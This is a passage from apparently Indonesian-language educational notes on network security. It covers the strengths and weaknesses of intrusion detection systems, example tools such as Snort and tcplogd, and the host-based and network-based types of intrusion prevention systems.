Teknik lainnya yang digunakan adalah dengan memantau berkas-berkas sistem operasi, yakni dengan cara melihat apakah ada percobaan untuk mengubah beberapa berkas sistem operasi, utamanya berkas log. Teknik ini seringnya diimplementasikan di dalam HIDS, selain tentunya melakukan pemindaian terhadap log sistem untuk memantau apakah terjadi kejadian yang tidak biasa.

D.    Kelebihan dan kekurangan IDS

a)    Kelebihan
  • Dapat mendeteksi “external hackers” dan serangan jaringan internal.
  • Dapat disesuaikan dengan mudah dalam menyediakan perlindungan untuk keseluruhan jaringan.
  • Dapat dikelola secara terpusat dalam menangani serangan yang tersebar dan bersama-sama.
  • Menyediakan pertahanan pada bagian dalam.
  • Menyediakan layer tambahan untuk perlindungan.
  • IDS memonitor Internet untuk mendeteksi serangan.
  • IDS membantu organisasi utnuk mengembangkan dan menerapkan kebijakan keamanan yang efektif.
  • IDS  memungkinkan anggota non-technical untuk melakukan pengelolaan keamanan menyeluruh.
  • Adanya pemeriksaan integritas data dan laporan perubahan pada file data.
  • IDS  melacak aktivitas pengguna dari saat masuk hingga saat keluar.
  • IDS menyederhanakan sistem sumber informasi yang kompleks.
  • IDS memberikan integritas yang besar bagi infrastruktur keamanan lainnya



b)    Kekurangan

  • Lebih bereaksi pada serangan daripada mencegahnya.
  • Menghasilkan data yang besar untuk dianalisis.
  • Rentan terhadap serangan yang “rendah dan lambat”.
  • Tidak dapat menangani trafik jaringan yang terenkripsi.
  • IDS hanya melindungi dari karakteristik yang dikenal.
  • IDS tidak turut bagian dalam kebijakan keamanan yang efektif, karena dia harus diset terlebih dahulu.
  • IDS tidak menyediakan penanganan kecelakaaN.
  • IDS tidak mengidentifikasikan asal serangan.
  • IDS hanya seakurat informasi yang menjadi dasarnya.
  • Network-based IDS rentan terhadap “overload”.
  • Network-based IDS dapat menyalahartikan hasil dari transaksi yang mencurigakaN.
  • Paket terfragmantasi dapat bersifat problematis

E.    Contoh program IDS

a)    chkwtmp Program yang melakukan pengecekan terhadap entry kosong. dalam arti wtmp mencatat sesuatu tapi isinya kosong.

b)    tcplogd Program yang mendeteksi stealth scan. stealth scan adalah scanning yang dilakukan tanpa harus membuat sebuah sesi tcp. sebuah koneksi tcp dapat terbentuk jika klien mengirimkan paket dan server mengirimkan kembali paketnya dengan urutan tertentu, secara terus menerus sehingga sesi tcp dapat berjalan. stealth scan memutuskan koneksi tcp sebelum klien menrima kembali jawaban dari server. scanning model ini biasanya tidak terdeteksi oleh log umum di linux.

c)    hostsentry Program yang mendeteksi login anomali. anomlai disini termasuk perilaku aneh (bizzare behaviour), anomali waktu (time anomalies), dan anomali lokal (local anomalies).

d)    snort
Snort adalah program IDS yang bekerja pada umumnya pada sistem operasi Linux, namun banyak pula versi yang dapat digunakan di beragam platform [5]. Snort pada umumnya merujuk kepada intrusion detection system yang sifatnya lightweight atau ringan karena diperuntukkan bagi jaringan kecil. Snort sangat fleksibel karena arsitekturnya yang berbasis rule [6].





Pengertian IPS (Intrusion Prevention System)
"Merupakan kombinasi antara firewall dengan IDS. IPS diciptakan untuk memecahkan masalah serangan yang selalu melanda pada  jaringan komputer dan memperbaiki kinerja dari IDS . IPS membuat akses kontrol dengan cara melihat konten aplikasi, dari pada melihat IP address atau ports, yang biasanya dilakukan oleh firewall. IPS mampu mencegah serangan yang datang dengan bantuan administrator secara minimal atau bahkan tidak sama sekali. Secara logic IPS dapat menghalangi suatu serangan sebelum terjadi eksekusi dalam memori, selain itu IPS membandingkan file checksum yang tidak semestinya mendapatkan izin untuk dieksekusi dan juga bisa menginterupsi sistem call"

Dari Kutipan Di atas dapat disimpulkan Bahwa IPS berfungsi sebagai penghalang suatu serangan yg akan dilakukan oleh para perusak jaringan.IPS juga merupakan sebuah kombinasi dari IDS,sehingga IPS dapat membedakan mana file yg semestinya mendapatkan izin atau tidak,mungkin kita bisa ambil contoh pada Yahoo,jadi jika file yg dianggap mencurigakan akan masuk ke SPAM.

 IPS secara umum terbagi menjadi 2, yaitu:
a. Host-based Intrusion Prevention System
Host Based Intrusion Prevention System merupakan sebuah system pecegahan yang terdiri dari banyak layer, menggunakan packet filtering, sehingga data yang masuk sudah di periksa dahulu. inspeksi status dan metode pencegahan intrusi yang bersifat real-time untuk menjaga host berada di bawah keadaan dari efisiensi performansi yang layak. Mekanisme kerjanya yaitu dengan mencegah kode-kode berbahaya yang memasuki host agar tidak dieksekusi tanpa perlu untuk mengecek threat signature.
b. Network Intrusion Prevention System
Network Based IPS (NIPS), yang juga disebut sebagai “In-line proactive protection”, merupakan penahan atau bloking semua trafik jaringan dan menginspeksi kelakuan dan kode yang di curigai merupakan penyerangan. Karena menggunakan in-line model, sehingga performansinya yang tinggi. untuk mencegah terjadinya bottleneck pada jaringan. untuk mengakselerasi performansi bandwidth tersebut, NIPS biasanya menggunakan tiga komponen yaitu :
1. Network Chips (Network processor)
2. FPGA Chips
3. ASIC Chips